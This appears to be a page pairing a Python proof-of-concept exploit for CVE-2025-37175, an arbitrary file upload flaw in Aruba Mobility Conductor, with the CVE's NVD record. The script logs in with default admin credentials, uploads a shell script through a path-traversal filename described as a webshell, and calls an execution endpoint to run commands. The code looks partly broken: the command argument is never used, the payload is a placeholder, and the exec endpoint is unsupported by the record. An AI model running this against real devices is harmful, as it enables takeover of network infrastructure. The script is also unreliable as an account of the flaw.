CVE-2025-37175

#!/usr/bin/env python3 # CVE-2025-37175 PoC - Aruba Mobility Conductor Arbitrary File Upload # Note: This PoC is for educational and authorized testing purposes only import requests import sys import json # Disable SSL warnings for testing in controlled environments requests.packages.urllib3.disable_warnings() TARGET_URL = "https://<target-ip>:4343" USERNAME = "admin" PASSWORD = "admin" def login(): """Authenticate to Aruba Mobility Conductor""" login_url = f"{TARGET_URL}/v1/api/login" data = { "username": USERNAME, "password": PASSWORD } try: response = requests.post(login_url, json=data, verify=False, timeout=30) if response.status_code == 200: return response.cookies except requests.RequestException as e: print(f"[-] Login failed: {e}") return None def upload_malicious_file(session_cookies): """Upload arbitrary file to the target""" upload_url = f"{TARGET_URL}/v1/configuration/upload" # Malicious file content (webshell) files = { 'file': ('exploit.sh', '#!/bin/bash\n# Malicious payload here\n', 'application/octet-stream') } data = { 'filename': '../webapp/static/exploit.sh', 'action': 'upload' } try: response = requests.post(upload_url, files=files, data=data, cookies=session_cookies, verify=False, timeout=30) if response.status_code == 200: print("[+] File uploaded successfully") return True except requests.RequestException as e: print(f"[-] Upload failed: {e}") return False def execute_command(session_cookies, cmd): """Execute arbitrary command via uploaded file""" exec_url = f"{TARGET_URL}/v1/api/exec" params = { "file": "exploit.sh" } try: response = requests.get(exec_url, params=params, cookies=session_cookies, verify=False, timeout=30) return response.text except requests.RequestException as e: print(f"[-] Execution failed: {e}") return None def main(): print("[*] CVE-2025-37175 PoC - Aruba Mobility Conductor RCE") print("[*] Target:", TARGET_URL) # Step 1: Login print("\n[1] Authenticating...") cookies = login() if not cookies: print("[-] Authentication failed") sys.exit(1) print("[+] Authentication successful") # Step 2: Upload malicious file print("\n[2] Uploading malicious file...") if upload_malicious_file(cookies): print("[+] File upload successful") else: print("[-] File upload failed") # Step 3: Execute command print("\n[3] Executing command...") result = execute_command(cookies, "id") if result: print("[+] Command output:", result) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-37175", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:05.600", "lastModified": "2026-01-23T16:37:56.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary file upload vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files as a privilege user and execute arbitrary commands on the underlying operating system."}, {"lang": "es", "value": "Vulnerabilidad de carga de archivos arbitrarios existe en la interfaz de gestión basada en web de los conductores de movilidad que ejecutan sistemas operativos AOS-10 o AOS-8. La explotación exitosa podría permitir a un actor malicioso autenticado cargar archivos arbitrarios como un usuario privilegiado y ejecutar comandos arbitrarios en el sistema operativo subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.4.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "187C0AB6-1290-4FE3-9FFE-7317DC57B931"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.0.0", "versionEndExcluding": "10.4.1.10", "matchCriteriaId": "93E77EBB-E46E-47E5-ADD2-1BD80257B08B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.7.2.2", "matchCriteriaId": "48B3A810-4DD3-403E-9A76-AB86EF7EA9D1"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}